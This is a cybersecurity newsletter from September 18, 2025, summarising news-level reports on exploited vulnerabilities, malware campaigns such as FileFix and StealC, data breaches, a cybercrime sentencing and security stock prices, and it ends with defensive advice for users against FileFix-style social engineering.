Cyber Briefing: 2025.09.18

Apple patches CVE-2025-43300, FileFix drops StealC, Google removes 224 apps, Kimsuky fakes IDs, ShinyHunters hit Salesforce, Insight breach, ransomware links, Pompompurin jailed, Glilot raises $500M.

Sep 18, 2025

👉 What's happening in cybersecurity today?

Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.

First time seeing this? Please Subscribe

Get Help

🚨 Cyber Alerts

1. Apple Backports Fix For Exploited Bug

Apple has backported security patches for a recently discovered and actively exploited vulnerability, identified as CVE-2025-43300. This means the company has extended the fix to older, but still supported, operating systems and devices to protect a broader range of users.

2. FileFix Uses Steganography To Drop StealC

A new social engineering attack, called FileFix, is impersonating Meta account warnings to deceive users. This campaign tricks victims into unknowingly installing the StealC infostealer malware by having them paste a malicious PowerShell command into the Windows File Explorer address bar, disguised as a harmless file path.

3. Google Removes 224 Android Malware Apps

A large-scale Android ad fraud operation called "SlopAds" was shut down after 224 malicious apps on the Google Play Store generated 2.3 billion fraudulent ad requests daily. The apps were downloaded over 38 million times and used obfuscation and steganography to hide their malicious activity.

For more alerts, click here!

Search Jobs

💥 Cyber Incidents

4. AI Forged Military IDs Used In Phishing

A North Korean hacking group, Kimsuky, used an AI like ChatGPT to generate fake South Korean military ID cards for a spear-phishing campaign. This new tactic helped the attackers trick victims into downloading malware designed to steal data and enable remote control of their computers.

5. ShinyHunters Claims Salesforce Data Theft

The ShinyHunters extortion group claims to have stolen over 1.5 billion Salesforce records from 760 companies by compromising Salesloft Drift OAuth tokens. The threat actors used the stolen data to extort companies and look for sensitive credentials to enable further attacks.

6. Insight Partners Warns After Data Breach

Insight Partners, a New York-based venture capital firm, is notifying over 12,000 individuals about a data breach stemming from a ransomware attack. A "sophisticated social engineering attack" allowed hackers to access its network in October 2024 and encrypt servers in January 2025 after stealing sensitive personal, financial, and company data.

For more incidents, click here!

Click to Report

📢 Cyber News

7. Researchers Uncover Ransomware Links

A summary of the recent findings in cybersecurity reveals that major ransomware groups are not isolated entities but are instead part of a complex network. They share code, infrastructure, and personnel, making it harder to track them using traditional methods.

8. DOJ Resentences BreachForums Founder

Former BreachForums administrator, Conor Brian Fitzpatrick, has been resentenced to three years in prison for his role in running the cybercrime forum and possessing child sexual abuse material (CSAM), after his initial sentence of time served was vacated. Fitzpatrick, who went by the alias "Pompompurin," pleaded guilty to multiple charges and was required to forfeit over 100 domain names, electronic devices, and cryptocurrency.

9. Glilot Capital Raises 500 Million Fund

Israeli venture capital fund Glilot Capital has successfully raised $500 million, bringing its total assets under management to over $1 billion. This new capital will be used to support early-stage startups focused on cybersecurity, AI, and enterprise software.

For more news, click here!

Check Events

📈Cyber Stocks

On Thursday, September 18, 2025, cybersecurity stocks moved in different directions as investors balanced inflation concerns, Federal Reserve policy uncertainty, and sector-specific developments. Some companies saw modest gains supported by product momentum, while others faced selling pressure tied to valuation and spending outlooks.

Cloudflare (NET) closed at $213.88, falling 2.44 percent as the stock retreated on concerns over margin compression and valuation following muted reactions to its forward guidance.
Rapid7 (RPD) finished at $19.50, slipping slightly as macroeconomic uncertainty raised caution about enterprise security spending despite recent signs of operational strength.
CrowdStrike (CRWD) ended at $445.50, holding near flat as investors looked ahead to its upcoming Investor Day while weighing competitive pressures in endpoint security.
SentinelOne (S) settled at $18.36, gaining modestly as optimism around its AI driven XDR roadmap and product expansion helped offset concerns about margin pressure.
Okta (OKTA) closed at $90.00, trading flat as confidence from public sector contract wins and AI identity initiatives was balanced by worries over slowing enterprise demand in a weaker economy.

💡 Cyber Tip

🖼️ FileFix Uses Steganography to Drop StealC Infostealer

A new social engineering campaign, called FileFix, is impersonating Meta account suspension warnings to trick victims into running malicious PowerShell commands. Instead of typing the command, users are deceived into pasting what looks like a harmless file path into Windows File Explorer, but in reality it executes hidden code. The attack then downloads a malicious image containing concealed scripts and payloads through steganography, ultimately installing the StealC infostealer to steal sensitive data.

✅ What you should do

Never copy-paste commands or file paths from emails or web pages into File Explorer or PowerShell
Treat Meta account suspension messages with caution and verify them directly through official channels
Monitor clipboard activity and avoid executing anything you cannot fully verify
Use endpoint security tools that can detect steganography-based malware and PowerShell abuse
Report suspicious emails to your security team or provider

🔒 Why this matters

FileFix shows how attackers are evolving ClickFix-style social engineering tricks by hiding commands and malware inside images and clipboard content. This approach bypasses traditional detection tools and exploits human trust, making it a serious risk to both personal and business systems.